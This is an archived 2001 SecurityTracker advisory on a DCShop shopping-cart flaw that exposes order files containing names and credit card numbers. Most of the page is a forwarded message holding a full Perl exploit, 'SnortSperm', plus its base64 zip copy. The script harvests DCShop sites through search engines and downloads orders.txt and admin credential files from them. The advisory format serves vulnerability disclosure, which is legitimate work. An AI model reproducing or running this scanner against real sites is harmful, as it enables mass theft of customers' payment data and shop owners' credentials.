SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   DCShop Vendors:   DCScripts
(Exploit Code is Released) Re: DCShop Shopping Cart Lets Remote Users Obtain Names and Credit Card Numbers for Recent Orders
SecurityTracker Alert ID:  1002071
SecurityTracker URL:  http://securitytracker.com/id/1002071
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 23 2001
Impact:   Disclosure of authentication information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.002 BETA; possibly earlier betas
Description:   A vulnerability has been reported in the beta version of DCShop, a shopping cart application. The security hold allows remote users to retrieve credit card numbers in plaintext from the server if the server is not properly configured.

A user reports that exploit code has been released. The exploit code, which is contained in the Source Message, uses popular Internet search engines to locate sites that use DCShop and then attempts to retrieve the orders.txt file. In the vulnerable version of DCShop, the orders.txt file contains unencrypted credit card data for orders recently submitted to the site.

Impact:   A remote user can obtain names, addresses, and credit card data for recent orders from the server. A remote user may also be able to obtain the administrator's username and password from the server.
Solution:   The vendor has posted configuration recommendations. See the Vendor URL.
Vendor URL:  www.dcscripts.com/dcforum/dcshop/44.html (Links to External Site)
Cause:   Access control error, Configuration error
Underlying OS:  Linux (Any), UNIX (Any), Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 19 2001 DCShop Shopping Cart Lets Remote Users Obtain Names and Credit Card Numbers for Recent Orders



 Source Message Contents

Subject:  DCShop exploit


------=_NextPart_000_0028_01C113B7.6B19CB40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi All,

Seems like there will be a few stolen creditcards floating around in the
next week or two, with this scanner.

--
Sandra



[Editor's Note:  The following encoded file has been decoded for 
your convenience.]

#!/usr/bin/perl
#
# SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman

use LWP::Simple;
use LWP::UserAgent;
my $ua=new LWP::UserAgent;

# flush stdout (so we get 'in progress' messages)
$|=1;

# fake useragent
$ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");

# hash arrays
my %unique_hosts;
my %flatfiles;
my %pathfiles;
my %additional_paths;

# scanning using search engine
sub search_engine_scan {
	$url = shift;

	print STDERR ".";
	@hosts = split /\n/, get($url);
	for (@hosts) {
		if (/$link/) {
			$1 =~ /(.*)\/.*$/;
			$unique_hosts{$1} = $1;

			additional_hosts($1) if (scalar keys %additional_paths!=0);
		}
		search_engine_scan("$search_engine_url$1") if (/$next/);
	}
}		

# additional paths
sub additional_hosts {
	$url = shift;

	@split_url = split /\//, $url;	
	$stripped_url = "$split_url[0]//$split_url[2]";

	foreach $path (keys %additional_paths) {	
		if ($path =~ /^\//) {
			$unique_hosts{"$stripped_url$path"} = "$stripped_url$path";
		} else {
			$unique_hosts{"$url/$path"} = "$url/$path";
		}
	}	
}

# check arguements
foreach $opt (@ARGV) {
	$proxyserver = $1 if ($opt =~ "proxy=(.*)");
	$proxyport = $1 if ($opt =~ "port=(.*)");
	$altavista = 1 if ($opt eq "altavista");
	$google = 1 if ($opt eq "google");
	$lycos = 1 if ($opt eq "lycos");
	$flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
	$pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}

# show options if no valid arguements were found
if (!($altavista or $google or $lycos) && (scalar keys %flatfiles==0)) {
	print STDERR "SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner\n";
	print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for scanning using a proxy server\nport=<proxyport> for specifying proxy port (default proxy port is 8080)\n
	altavista for scanning using altavista\ngoogle for scanning using google\nlycos for scanning using lycos\nflatfile=<filename> for scanning using a flat file\npathfile=<filename> for additional paths\n\noptions can be combined";

	exit;
}

print STDERR "SnortSperm v1.0, a DCShop (Web shopping cart system) order and account scanner\n";

# load additional paths
foreach $pathfile (keys %pathfiles) {
	if ($pathfile ne '') {
        	open(FH, $pathfile);
        	while (<FH>) {
        		chomp;
        		$_ = $1 if (/(.*)\/$/);

        		$additional_paths{$_}=$_ if ($_ ne '');
        	}	
	}
}

# scan through a proxy (insert proxyserver and port)
if ($proxyserver) {
	$proxyport = 8080 if (!$proxyport);

	print STDERR "using $proxyserver:$proxyport as proxy\n";

	$ua->proxy('http',"$proxyserver:$proxyport");
}

# scanning using selected search engines
if ($altavista) {
	print STDERR "\nScanning using altavista";

	$search_engine_url = "http://www.altavista.com";
	$link = "status='([^']*)";
	$next = "a href=\"([^\"]+).*\\[Next";
	search_engine_scan("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX");
}
if ($google) {
	print STDERR "\nScanning using google";

	$search_engine_url = "http://www.google.com";
	$link = "<p><A HREF=([^>]*)";
	$next = "A HREF=([^>]+).*<b>Next<\\/b>";
	search_engine_scan("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
	print STDERR "\nScanning using lycos";

	$search_engine_url = "http://www.lycos.co.uk";
	$link = "<b><a href=\"([^\"]*)";
	$next = "A HREF=([^>]+).*<B>Forward<\\/B>";
	search_engine_scan("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=main&etemp=error&query=DCShop&cat=lycos");
}

# scanning using flat file(s)
foreach $flatfile (keys %flatfiles) {
	if ($flatfile ne '') {
		print STDERR "\nScanning using flat file: $flatfile";

        	open(FH, $flatfile);
        	while (<FH>) {
        		chomp;
        		$_ = "http://$_" if (not /:\/\//);
        		$_ = $1 if (/(.*)\/$/);
        		$unique_hosts{$_}=$_ if ($_ ne 'http:/');

			additional_hosts($_) if ((scalar keys %additional_paths!=0) && ($_ ne 'http:/'));
        	}	
	}
}

# show number of hosts found
$total_hosts = scalar keys %unique_hosts;
print STDERR "\nFound approximately $total_hosts hosts to scan\n\n";

my $url;
# scan for vulnerable hosts
foreach $key (keys %unique_hosts) {
	$first_try = "Orders/orders.txt";
	$second_try = "orders/orders.txt";

	for ($counter=0;$counter<2;$counter++) {
		$url = $key;
		$pos = 1;
		$success = 0;
		while(($success == 0) && (not $url =~ /:\/$/)) {
			print STDERR "Trying $url/$first_try\n";
	
			$url_ = "$url/$first_try";
			$page = get($url_);
			@lines = split /\x0d/, $page;
			if ((@lines+0 == 0) || ($lines[0] =~ /^</) || ($lines[0] =~ /^\n</)) {
				print STDERR "Trying $url/$second_try\n";
	
				$url_ = "$url/$second_try";
				$page = get($url_);
				@lines = split /\x0d/, $page;
			} 	
			if ((@lines+0 > 0) && (not $lines[0] =~ /^</) && (not $lines[0] =~ /^\n</)) {
				print "$url_\n\n";
	
				$success = @lines+0;
				for (@lines) {
					$occurrences = ($_ =~ tr/|//);
					$max_occurrences = $occurrences if ($occurrences > $max_occurrences);
	
					if (/^\n</) {
						print "\n";

						last;
					}
					print "$_";
				}
				print "\n" if ($occurrences == 1);
				print "\n";
				print STDERR "Success.\n\n";
			}
			$url = substr $url,0,rindex $url,"/";
		} 
		print STDERR "No success.\n\n" if ($success == 0);
	
		$first_try = "Auth_data/auth_user_file.txt";
		$second_try = "auth_data/auth_user_file.txt";
	}
}





------=_NextPart_000_0028_01C113B7.6B19CB40
Content-Type: application/x-zip-compressed;
	name="ss.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="ss.zip"

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
AAIAAgB8AAAA1wgAAAAA

------=_NextPart_000_0028_01C113B7.6B19CB40--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC